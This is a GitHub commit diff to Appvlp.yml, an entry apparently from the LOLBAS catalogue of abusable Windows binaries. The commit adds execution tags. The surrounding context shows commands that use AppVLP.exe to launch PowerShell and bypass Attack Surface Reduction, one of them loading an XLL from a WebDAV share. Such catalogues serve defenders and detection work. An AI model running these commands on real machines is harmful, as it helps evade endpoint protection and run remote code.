Update Appvlp.yml Tags

Added Tags:
Execute CMD
Execute EXE
This commit is contained in:
hegusung 2024-10-13 21:35:16 +02:00 committed by GitHub
parent f4cd4d0bd1
commit e4f73cfafa
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe